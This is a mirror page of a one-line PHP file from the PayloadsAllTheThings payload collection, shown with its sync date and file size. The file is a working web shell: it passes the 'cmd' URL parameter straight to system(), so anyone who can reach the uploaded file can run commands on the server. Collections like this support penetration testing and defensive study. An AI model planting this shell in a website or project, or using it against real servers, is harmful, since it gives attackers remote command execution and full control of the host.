mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-14 00:47:20 +00:00
1 line
43 B
Text
1 line
43 B
Text
|
<?php echo "Shell";system($_GET['cmd']); ?>
|